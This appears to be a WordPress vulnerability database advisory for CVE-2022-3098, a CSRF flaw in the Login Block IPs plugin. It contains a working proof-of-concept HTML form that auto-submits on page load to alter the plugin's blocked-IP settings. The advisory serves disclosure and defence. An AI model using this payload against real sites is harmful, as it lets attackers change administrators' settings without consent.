WordPress Plugin Vulnerabilities

Login Block IPs <= 1.0.0 - Arbitrary Setting Update via CSRF

Description

The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack

Proof of Concept

Make a logged in admin open a page containing the HTML code below

<form id="test" action="https://example.com/wp-admin/admin.php?page=login-block-ips%2Fadmin%2Fpartials%2Flogin-block-ips-admin-display.php" method="POST">
    <input type="text" name="login-block-ips-form" value="1">
    <input type="text" name="security_code" value="fff">
    <input type="text" name="ip1" value="4.4.4.4">
    <input type="text" name="ipdesc1" value="test4">
    <input type="text" name="ip2" value="">
    <input type="text" name="ipdesc2" value="">
    <input type="text" name="ip3" value="">
    <input type="text" name="ipdesc3" value="">
    <input type="text" name="ip4" value="">
    <input type="text" name="ipdesc4" value="">
    <input type="text" name="ip5" value="">
    <input type="text" name="ipdesc5" value="">
    <input type="text" name="ip6" value="">
    <input type="text" name="ipdesc6" value="">
    <input type="text" name="ip7" value="">
    <input type="text" name="ipdesc7" value="">
    <input type="text" name="ip8" value="">
    <input type="text" name="ipdesc8" value="">
    <input type="text" name="ip9" value="">
    <input type="text" name="ipdesc9" value="">
    <input type="text" name="ip10" value="">
    <input type="text" name="ipdesc10" value="">
    <input type="text" name="ip11" value="">
    <input type="text" name="ipdesc11" value="">
    <input type="text" name="ip12" value="">
    <input type="text" name="ipdesc12" value="">
    <input type="text" name="ip13" value="">
    <input type="text" name="ipdesc13" value="">
    <input type="text" name="ip14" value="">
    <input type="text" name="ipdesc14" value="">
</form>
<script>
    document.getElementById("test").submit();
</script>

Affects Plugins

Plugin icon
login-block-ips
No known fix

References

CVE
CVE-2022-3098

Classification

Type
CSRF
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352
CVSS
4.3 (medium)

Miscellaneous

Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
https://daniel-ruf.de
Verified
Yes
WPVDB ID
f4fcf41b-c05d-4236-8e67-a52d0f94c80a

Timeline

Publicly Published
2022-09-05 (about 1 years ago)
Added
2022-09-05 (about 1 years ago)
Last Updated
2022-09-05 (about 1 years ago)

Other

Published
Title
Published
2024-01-17
Title
Browser Theme Color <= 1.3 - Cross-Site Request Forgery via btc_settings_page
Published
2023-11-09
Title
Simple Giveaways < 2.46.1 - CSRF
Published
2021-07-05
Title
WP EasyPay – Square for WordPress < 3.2.3 - Cross-Site Request Forgery
Published
2023-02-28
Title
OAuth Single Sign On - SSO (OAuth Client) Standard < 28.4.9 - IdP Deletion via CSRF
Published
2023-09-29
Title
WP Hide Pages <= 1.0 - Settings Update via CSRF